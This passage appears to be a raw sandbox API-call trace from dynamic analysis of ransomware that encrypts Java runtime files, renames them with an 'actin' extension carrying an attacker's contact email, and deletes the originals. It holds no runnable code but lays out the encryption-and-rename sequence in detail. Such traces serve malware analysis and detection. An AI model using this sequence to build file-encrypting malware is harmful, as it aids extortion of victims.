(normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.934] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.934] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.934] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3791058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.945] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x13a2b2, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.945] ReadFile (in: hFile=0x2e0, lpBuffer=0x37d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x37d1058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.955] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x36e816, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.955] ReadFile (in: hFile=0x2e0, lpBuffer=0x3811058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3811058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0154.116] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef71c | out: phKey=0x33ef71c*=0xac34b0) returned 1 [0154.116] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0154.116] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060) returned 1 [0154.118] CryptDestroyKey (hKey=0xac34b0) returned 1 [0154.118] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f8 | out: lpNewFilePointer=0x0) returned 1 [0154.118] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x33ef708, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef708*=0xc0112, lpOverlapped=0x0) returned 1 [0154.139] SetEndOfFile (hFile=0x2e0) returned 1 [0154.139] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x36e816, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0154.139] WriteFile (in: hFile=0x2e0, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0154.141] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x13a2b2, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0154.141] WriteFile (in: hFile=0x2e0, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0154.143] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0154.143] WriteFile (in: hFile=0x2e0, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0154.144] CloseHandle (hObject=0x2e0) returned 1 [0154.145] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0154.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0154.145] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=8286) returned 1 [0154.145] CloseHandle (hObject=0x2e0) returned 1 [0154.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar")) returned 0x20 [0154.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0154.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0154.145] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0154.145] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0154.146] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0154.146] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2ef0) returned 1 [0154.146] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0154.240] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x205e, lpOverlapped=0x0) returned 1 [0154.273] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x2060, dwBufLen=0x2060 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x2060) returned 1 [0154.273] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x2060, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x2060, lpOverlapped=0x0) returned 1 [0154.274] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33f0) returned 1 [0154.274] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0154.274] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0154.274] CryptDestroyKey (hKey=0xac33f0) returned 1 [0154.274] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0154.274] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0154.274] CloseHandle (hObject=0x2e0) returned 1 [0154.274] CloseHandle (hObject=0x2ec) returned 1 [0154.275] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar")) returned 1 [0154.276] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0154.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0154.277] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2204781) returned 1 [0154.277] CloseHandle (hObject=0x2ec) returned 1 [0154.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar")) returned 0x20 [0154.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0154.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0154.278] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0154.278] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0154.278] ReadFile (in: hFile=0x2ec, lpBuffer=0x3791058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3791058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0154.288] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xb36cf, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0154.288] ReadFile (in: hFile=0x2ec, lpBuffer=0x37d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x37d1058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0154.294] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x1da46d, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0154.294] ReadFile (in: hFile=0x2ec, lpBuffer=0x3811058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3811058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0154.310] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef71c | out: phKey=0x33ef71c*=0xac3330) returned 1 [0154.310] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0154.311] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060) returned 1 [0154.312] CryptDestroyKey (hKey=0xac3330) returned 1 [0154.312] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f8 | out: lpNewFilePointer=0x0) returned 1 [0154.312] WriteFile (hFile=0x2ec, lpBuffer=0x3791020, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x33ef708, lpOverlapped=0x0) Thread: id = 119 os_tid = 0xfe4 [0140.159] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x31300a8 [0140.159] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x31400b0 [0140.159] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a9ce0 [0140.159] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x110102) returned 0x38be020 [0140.162] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x50) returned 0x26a9d10 [0140.162] CryptImportKey (in: hProv=0xa968b8, pbData=0x352fb60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x352fbc8 | out: phKey=0x352fbc8*=0xaa9610) returned 1 [0140.162] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x352fbb0, dwFlags=0x0) returned 1 [0140.162] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d10, pdwDataLen=0x352fb7c | out: pbData=0x26a9d10, pdwDataLen=0x352fb7c) returned 1 [0140.162] CryptDestroyKey (hKey=0xaa9610) returned 1 [0140.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0140.162] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0140.162] Wow64DisableWow64FsRedirection (in: OldValue=0x352fc18 | out: OldValue=0x352fc18*=0x0) returned 1 [0140.162] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d10 | out: hHeap=0x26a0000) returned 1 [0140.162] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.163] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.164] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.165] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.166] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.167] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.168] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.169] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.170] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.171] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.172] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, 